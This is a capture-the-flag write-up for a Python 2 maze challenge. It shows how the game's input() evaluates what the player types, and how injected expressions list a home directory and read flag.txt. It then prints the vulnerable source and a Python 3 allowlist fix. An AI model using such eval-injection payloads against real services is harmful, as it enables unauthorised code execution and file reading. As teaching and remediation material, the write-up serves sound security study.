No Step On Snek
Category: Pwn
75 points
I heard you guys like python pwnables
nc umbccd.io 4000
Author: trashcanna
Solution
At the given address there was a snake-looking game, which didn't seem to be working.
nc umbccd.io 4000
Welcome to the aMAZEing Maze
Your goal is to get from one side of the board to the other.
Your character is represented by "OO" and the finish will be "FF"
W/w - Move up!
A/a - Move left!
S/s - Move down!
D/d - Move right!
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
|OO | | | |
+ +--+--+--+ + + +--+ +--+--+--+--+--+ + +
| | | | | | | | | |
+ + + + +--+--+--+--+--+ + +--+ + +--+ +
| | | | | | | |
+--+--+ + +--+--+--+--+--+--+ + +--+--+ + +
| | | | | | | |
+ +--+--+ + +--+--+ + +--+--+ +--+ + + +
| | | | | | | | | |
+ + +--+--+--+--+ + + + +--+--+ +--+--+ +
| | | | | | | |
+ +--+--+--+ +--+--+ + +--+ + +--+--+ + +
| | | | | | | | |
+ +--+ +--+--+ + +--+ + +--+ + + +--+--+
| | | | | | | | | | |
+--+--+ + + + +--+ +--+ + +--+--+--+--+ +
| | | | | | | |
+ +--+--+ +--+--+ +--+--+--+ +--+ +--+--+--+
| | | | | |
+--+ + +--+ + + +--+--+--+--+ +--+--+--+ +
| | | | | | | | |
+ +--+--+ + +--+--+--+ + +--+--+ +--+ + +
| | | | | | | |
+--+--+ + + + + +--+ +--+--+--+--+ +--+--+
| | | | | | | | |
+--+ +--+--+ +--+ + +--+--+ +--+ +--+--+ +
| | | | | | | |
+ +--+--+--+--+ + + +--+ +--+ +--+--+ + +
| | | | | | | | | |
+ + +--+--+ +--+--+--+ +--+ + + + + + +
| | | | |FF|
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
After a while I managed to get RCE as shown below and read the flag.
Make your move: make_move(os.listdir('/home/challuser'))
['.bashrc', '.profile', '.bash_logout', 'nosteponsnek.py', 'flag.txt']
Make your move: make_move(open('flag.txt', 'rt').read())
DawgCTF{bUt_iT'5_c@ll3d_1nput}
Remark: I knew the /home/challuser path from the traceback after crashing the app (example below).
Make your move: crash ;-)
Traceback (most recent call last):
  File "/home/challuser/nosteponsnek.py", line 73, in <module>
    __main__()
  File "/home/challuser/nosteponsnek.py", line 69, in __main__
    still_playing = make_move(maze)
  File "/home/challuser/nosteponsnek.py", line 27, in make_move
    move = input("Make your move: ")
  File "<string>", line 1
    crash ;-)
            ^
SyntaxError: invalid syntax
I've also checked the source code of nosteponsnek.py to understand why I got the flag this way ;-)
#!/usr/bin/env python2.7
from random import shuffle, randrange
import os

# Movement deltas; a move counts as "valid" only if input() evaluates to one of these.
W = 1
w = 1
A = -9
a = -9
S = -1
s = -1
D = 9
d = 9
valid_moves = [W, w, A, a, S, s, D, d]

def welcome():
    print "Welcome to the aMAZEing Maze"
    print "Your goal is to get from one side of the board to the other."
    print "Your character is represented by \"OO\" and the finish will be \"FF\""
    print "W/w - Move up!"
    print "A/a - Move left!"
    print "S/s - Move down!"
    print "D/d - Move right!"

def make_move(maze):
    print maze
    # Python 2 input() is eval(raw_input()): the line is executed as an
    # expression before the validity check below is ever reached.
    move = input("Make your move: ")
    if move not in valid_moves:
        raise NameError
    # TODO: Move the player around the board
    # Was a little crunched for time this year so I didn't feel like writing
    # the gameplay. I hope that's okay :/
    return True

def replace_last(s, replace_what, replace_with):
    head, _sep, tail = s.rpartition(replace_what)
    return head + replace_with + tail

# Randomly generate the gameboard and insert start/finish
def make_maze(w = 16, h = 16):
    # Each cell is three characters wide: "+--" / "+  " for horizontal walls,
    # "|  " / "   " for vertical walls; a border of visited cells stops walk().
    vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)]
    ver = [["|  "] * w + ['|'] for _ in range(h)] + [[]]
    hor = [["+--"] * w + ['+'] for _ in range(h + 1)]

    def walk(x, y):
        # Recursive backtracking: knock down the wall towards each unvisited neighbour
        vis[y][x] = 1
        d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]
        shuffle(d)
        for (xx, yy) in d:
            if vis[yy][xx]: continue
            if xx == x: hor[max(y, yy)][x] = "+  "
            if yy == y: ver[y][max(x, xx)] = "   "
            walk(xx, yy)

    walk(randrange(w), randrange(h))
    s = ""
    for (a, b) in zip(hor, ver):
        s += ''.join(a + ['\n'] + b + ['\n'])
    # Player "OO" takes the first two spaces, finish "FF" the last one
    s = s.replace(" ", "O", 2)
    s = replace_last(s, " ", "FF")
    return s

def __main__():
    welcome()
    still_playing = True
    maze = make_maze()
    while(still_playing):
        still_playing = make_move(maze)
    print "Congrats! You've finished the maze! Here's your flag:"
    os.system("/bin/cat flag.txt")

__main__()
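The root cause is that Python 2's input() evaluates the typed line as an expression, so the `if move not in valid_moves` check only runs after arbitrary code has already executed. As an added example (my code, not the challenge's), here is a Python 3 replacement for make_move's input handling that treats the line as opaque text and maps it through an allowlist of the same W/A/S/D deltas; MOVE_DELTAS, parse_move and play are names I chose.

```python
# Added example, not the challenge's source: read a move as text and map it
# through an allowlist instead of evaluating it.  Python 2 input() is
# eval(raw_input()); Python 3 input() (or Python 2 raw_input()) returns a str,
# and nothing here ever calls eval()/exec() on it.
from typing import Iterable, List, Tuple

# Same movement deltas the challenge defines, keyed by the letter the player
# is allowed to send.  Anything not in this table is rejected unevaluated.
MOVE_DELTAS = {
    "W": 1,  "w": 1,
    "A": -9, "a": -9,
    "S": -1, "s": -1,
    "D": 9,  "d": 9,
}


class InvalidMove(ValueError):
    """Raised for any line that is not exactly one allowed move letter."""


def parse_move(line: str) -> int:
    """Return the movement delta for a single W/A/S/D keystroke.

    The line is stripped and looked up, never interpreted: empty input,
    over-long input and anything that looks like code (e.g. "make_move(...)")
    all fail here with InvalidMove.
    """
    token = line.strip()
    if len(token) != 1 or token not in MOVE_DELTAS:
        raise InvalidMove("expected one of W/A/S/D, got %r" % line[:32])
    return MOVE_DELTAS[token]


def play(lines: Iterable[str]) -> Tuple[List[int], List[str]]:
    """Feed a sequence of player lines (e.g. from stdin) to the parser.

    Returns (accepted_deltas, rejected_lines): rejected lines are reported,
    not executed, and the game keeps going instead of crashing with a traceback.
    """
    accepted, rejected = [], []
    for line in lines:
        try:
            accepted.append(parse_move(line))
        except InvalidMove:
            rejected.append(line)
    return accepted, rejected


if __name__ == "__main__":
    import sys
    deltas, bad = play(sys.stdin)
    print("moves:", deltas, "rejected:", bad)
```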
Flag
DawgCTF{bUt_iT'5_c@ll3d_1nput}